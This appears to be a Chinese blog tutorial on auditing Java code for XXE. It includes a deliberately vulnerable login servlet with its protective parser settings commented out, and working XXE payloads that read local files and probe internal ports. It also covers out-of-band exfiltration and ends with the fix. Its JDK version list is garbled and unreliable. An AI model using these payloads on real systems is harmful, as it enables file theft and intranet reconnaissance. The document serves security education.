java代码审计9之XXE

最新推荐文章于 2024-05-29 07:48:21 发布
最新推荐文章于 2024-05-29 07:48:21 发布
阅读量520 收藏
点赞数
分类专栏: 代码审计 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43970718/article/details/132197734
版权

文章目录

之前的文章,
php代码审计9之XXE

1、简介

XXE(XML外部实体注⼊,XML External Entity) ,在应⽤程序解析XML输⼊时,

当允许引⽤外部实体时,可构造恶意内容,

导致读取任意⽂件、探测内⽹端⼝、攻击内⽹⽹站、发起DoS拒绝服务攻击、 执⾏系统命令等。

Java中的XXE⽀持sun.net.www.protocol ⾥的所有协议:

http,https,file,ftp,mailto,jar, netdoc。

⼀般利⽤file协议读取⽂件,利⽤http协议探测内⽹,

没有回显时可组合利⽤file协议和ftp协议来读取⽂件。

2、 java XXE审计函数

重点关注下边这些函数,

javax.xml.parsers.DocumentBuilderFactory;
javax.xml.parsers.SAXParser
javax.xml.transform.TransformerFactory
javax.xml.validation.Validator
javax.xml.validation.SchemaFactory
javax.xml.transform.sax.SAXTransformerFactory
javax.xml.transform.sax.SAXSource
javax.xml.bind.Unmarshaller
javax.xml.xpath.XpathExpression
javax.xml.stream.XMLStreamReader

org.xml.sax.XMLReader
org.xml.sax.helpers.XMLReaderFactory

org.dom4j.io.SAXReader
org.jdom.input.SAXBuilder
org.jdom2.input.SAXBuilder

org.apache.commons.digester3.Digester

解析XML的⽅法越来越多,java中常⻅有四种,即:DOM、DOM4J、JDOM 和SAX。

下⾯以这四种为例展示java的XXE漏洞

3、漏洞

3.1、正常的业务

模拟使用xml来传输登录信息,这是登录成功的情况,返回1

在这里插入图片描述

登录失败,返回0,

在这里插入图片描述

具体测试代码,

package com.example;


import org.w3c.dom.Document;
import org.w3c.dom.NodeList;

import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import java.io.IOException;

@WebServlet("/xxe1")
public class xxe1Servlet extends HttpServlet {
    private static final String USERNAME = "admin";//账号
    private static final String PASSWORD = "admin";//密码
    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        String result="";
        try {
            //DOM Read XML
            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
     /*       dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);*/
            DocumentBuilder db = dbf.newDocumentBuilder();
            Document doc = db.parse(request.getInputStream());
            String username = getValueByTagName(doc,"username");
            String password = getValueByTagName(doc,"password");
            if(username.equals(USERNAME) && password.equals(PASSWORD)){
                result = String.format("<result><code>%d</code><msg>%s</msg></result>",1,username);
            }else{
                result = String.format("<result><code>%d</code><msg>%s</msg></result>",0,username);
            }
        } catch (ParserConfigurationException | org.xml.sax.SAXException e) {
            e.printStackTrace();
            result = String.format("<result><code>%d</code><msg>%s</msg></result>",3,e.getMessage());
        }
        response.setContentType("text/xml;charset=UTF-8");
        response.getWriter().append(result);
    }
    protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        doPost(request, response);
    }

    /**
     *
     * @param doc 文档
     * @param tagName 标签名
     * @return 标签值
     */
    public static String getValueByTagName(Document doc, String tagName){
        if(doc == null || tagName.equals(null)){
            return "";
        }
        NodeList pl = doc.getElementsByTagName(tagName);
        if(pl != null && pl.getLength() > 0){
            return pl.item(0).getTextContent();
        }
        return "";
    }
}

3.2、有回显的情况

通过上边的代码,可以看到,后端将传入的admin参数进行了回显输出,

下边是ftp、netdoc、http协议分别进行文件读取和内网端口探测的例子

此时就可以通过ftp协议读取服务器内容,然后利用用户名输出回显,

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lltest[
<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<user><username>&xxe;</username><password>123456</password></user>

通过netdoc协议读取,

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lltest[
<!ENTITY xxe SYSTEM "netdoc:///C:/Windows/win.ini">
]>
<user><username>&xxe;</username><password>123456</password></user>

在这里插入图片描述
类似的可以通过http协议探测内网,

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lltest[
<!ENTITY xxe SYSTEM "http://127.0.0.1:8082">
]>
<user><username>&xxe;</username><password>123456</password></user>

开放的端口,会返回一些内容,且响应较快,

在这里插入图片描述

未开放的端口,返回报错信息,且响应较慢,

在这里插入图片描述

3.3、无回显的情况

该方法的前提是,目标机器有出网权限。

直接vps起服务,让目标服务器来请求就ok了,建议实战使用

类似的,也可以直接让目标访问dnslog,实战不建议,会引发ioc的告警

在这里插入图片描述

上边的方式仅仅是探测到目标存在XXE,如何将读取的内容传递过来呢,

这里就是Java的外带只有外带一行数据,无法像php一样,外带很多数据,

参考使用脚本,
	
	https://github.com/LandGrey/xxe-ftp-server

除非jdk版本小于 7u141 和 小于 8u162;具体有哪些版本

JDK版本号的命名规则是:
JDK1.x、JDK2.x、JDK3.x、JDK4.x、JDK5.x、JDK6.x、JDK7.x、JDK8.x、JDK9.x、JDK10.x和JDK11.x。

因此,
小于7u141的版本有:
JDK 6u20, JDK 6u22, JDK 6u23, JDK 6u25, JDK 6u26, JDK 6u27, JDK 6u28, JDK 6u29, JDK 6u30, JDK 6u31;
小于8u162的版本有:JDK 7u141。

3.4、修复

两行代码,禁用外部实体,

dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);

在这里插入图片描述

划水的小白白
关注
专栏目录
Java代码审计XXE漏洞
大河之犬的博客
04-02 1411
XXE 漏洞的原理主要是利用了 XML 解析器的实体引用特性。在 XML 中,可以使用实体引用来引用外部的实体,例如文件,以便在 XML 文档中重用内容。然而,如果 XML 解析器未经适当配置,可能会导致外部实体的任意读取和执行,从而引发安全漏洞。攻击者可以构造恶意的 XML 文件,其中包含对外部实体的引用,并通过将这个 XML 文件提交给目标应用程序来触发漏洞。当目标应用程序解析这个 XML 文件时,解析器会尝试读取和解析外部实体,从而使得攻击者能够访问本地或远程系统上的文件,并执行相关操作。
Java代码审计XXE漏洞详解
悦分享
01-24 135
除此之外,XML文档中还规定了一系列定义好的“字符引用”,使用特殊的字母组合来表示某些特殊字符,如“
java代码审计--xxe
goddemon
09-15 305
常见关键字 Documentbuilder DocumentBuilderFactory SAXReader SAXParser SAXParserFactory SAXBuilder TransformerFactory reqXml getInputStream XMLReaderFactory .newInstance SchemaFactory SAXTransformerFactory javax.xml.bind XMLReader XmlUtils.get Validator java解析
代码审计——XXE详解
Boom!脑洞大爆炸的博客
06-17 605
代码审计XXE详解
Java代码审计安全篇-XXE(XML外部实体注入)漏洞
最新发布
dzqxwzoe的博客
05-29 1259
XML 实体允许定义标记,在分析 XML 文档时,这些标记将被内容替换。通常有三种类型的实体:内部实体外部实体参数实体。必须在文档类型定义 (DTD) 中创建一个实体,让我们从一个示例开始:正如你所看到的,一旦XML文档被解析器处理,它就会用定义的常量“JoSmith”替换定义的实体。正如你所看到的,这有很多优点,因为你可以在一个地方更改为例如“约翰史密斯”。js ``js在 Java 应用程序中,XML 可用于将数据从客户端获取到服务器,我们都熟悉 JSON API,我们也可以使用 xml。
Java代码审计XXE
网络安全从业者的学习笔记
03-02 1008
XXE(XML External Entity),即XML外部实体注入漏洞。XXE漏洞发生于应用程序在解析XML时,没有对恶意内容进行过滤,导致可造成文件读取,命令执行,攻击内网网站,内网端口扫描,进行DOS攻击等危害。 XML(Extensible Markup Language):可扩展标记语言,用来存储及传输信息。
java审计-XXE
admin741admin的博客
04-13 696
XML是一种非常流行的标记语言,XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。DTD实体的引用有内部声明实体和外部引用实体的区别。按类型分则分为:内置实体,字符实体,通用实体,参数实体。而在XXE中最常见的就是通用实体和参数实体。
完整的Java代码审计学习笔记资源(免费下载)
10-31
java代码审计-xxe.md 第一的 4年前 java代码审计-反序列化.md 添加一些关于 jndi 的内容 3年前 java代码审计-命令执行.md 第一的 4年前 java代码审计-文件操作.md 第一的 4年前 java代码审计-环境搭建+前置知识.md ...
一篇文章读懂Java代码审计XXE
热门推荐
Summer's blog
05-13 1万+
前言   学习总结Java审计过程中笔记,审计方法。 阅读要求:有简单Java代码基础,了解漏洞原理。 漏洞简介    简单来说,XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 有回显    不说废话,先看效果,成功读取文本内容。    代码分析漏洞成因: public String xxeDo...
【网络安全】JAVA代码审计—— XXE外部实体注入
HBohan的博客
01-14 1189
想要了解XXE,在那之前需要了解XML的相关基础
xxe漏洞php代码审计1
m0_55772907的博客
05-01 672
(1)原理 XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害 xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件 (2)基础知识 XML 被设计为传输和存储数据,其焦点是数据的内容HTML 被设计用来显示数据,其焦点是数据的外观...
JAVA常见的XXE漏洞写法和防御
表弟的博客
08-28 2214
JAVA常见的XXE漏洞写法和防御 貌似最近经常看到有Java项目爆出XXE的漏洞并且带有CVE,包括Spring-data-XMLBean XXE漏洞、JavaMelody组件XXE漏洞解析、Apache OFBiz漏洞。微信支付SDK的XXE漏洞。本质上xxe的漏洞都是因为对xml解析时允许引用外部实体,从而导致读取任意文件、探测内网端口、攻击内网网站、发起DoS拒绝服务攻击、执行系统命令等。...
java xxe漏洞利用_JAVAXXE漏洞
weixin_30445963的博客
03-09 2104
1. XXE简介XXE(XML外部实体注入,XML External Entity) ,漏洞在对不安全的外部实体数据进行处理时,可能存在恶意行为导致读取任意文件、探测内网端口、攻击内网网站、发起DoS拒绝服务攻击、执行系统命令等问题。简单来说,如果系统能够接收并解析用户的XML,但未禁用DTD和Entity时,可能出现XXE漏洞,常见场景如pdf在线解析、word在线解析、定制协议或者其他可以解析...
代码审计-XXE代码审计之XML讲解
cdyunaq的博客
03-09 244
XML基础讲解 XML语法 1、第一行必须定义为文档声明 <?xml version='1.0' encoding="utf-8" ?> 2、xml文档中必须有且只有一个根标签 <?xml version='1.0' ?> <Users>//根标签 <User id='1'> <name>alex</name> </User> </Users> 3、属性值必须唯一,如id='1' 4、CDATA区:
Java XXE 漏洞
柠檬木有枝
08-24 895
1 XML 基础 XML(可扩展标记语言,EXtensible Markup Language ),是一种标记语言,用来传输和存储数据 1.1 XML文档结构 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 <!--XML申明--> <?xml version="1.0"?> <!--文档类型定义--> <!DOCTYPE note [ <!--定义此文档是 note 类型的文档--> <!ELEMENT note (t
Java应用中的各种XXE
公众号shadow sock7
03-17 398
Java应用在使用XML库的时候特别容易受到XXE影响。因为大多数XML库的默认设置是存在XXE漏洞的。所以想要安全的使用这些XML库,就要显式地在解析器中禁用掉XXE。 结论说明 以下引用自:https://www.leadroyal.cn/?p=914 所有的【\r】 都会被替换为【\n】 如果不包含特殊字符,低版本 ftp 可以读多行文件,高版本 ftp 只可以读单行文件,全版本...
Java代码审计-XMI注入(XXE
二狗的博客
02-06 1724
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
Java代码审计——XML 外部实体注入(XXE
m0_61506558的博客
11-27 1163
XXE 为 XML 外部实体注入。当应用程序在解析 XML 输入时,在没有禁止外部实体的加载而导致加载了外部文驱动程序所必需的接口,其允许应用程序设置和查询解析器中的功能和属性、注册文档处理的事件处理程序,以及开始文档解析。当XMLReader 使用默认的解析方法并且未对。输入时,在没有禁止外部实体的加载而导致加载了外部文件及代码时,就会造成 XXE。文档的接口,其存在于公共区域中。XMLReader 接口是。XMLReader 接口是一种通过。漏洞,我们首先需要知道常见的能够解析。们一般用以下几种常见的。
java xxe代码审计方法
05-18
Java XXE(XML External Entity)漏洞是一种常见的Web漏洞,攻击者可以利用它来读取本地文件、发起...总之,在Java代码审计中,需要重点关注与XML相关的代码,并进行充分的验证和过滤,以防止XXE漏洞等Web漏洞的攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

划水的小白白

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值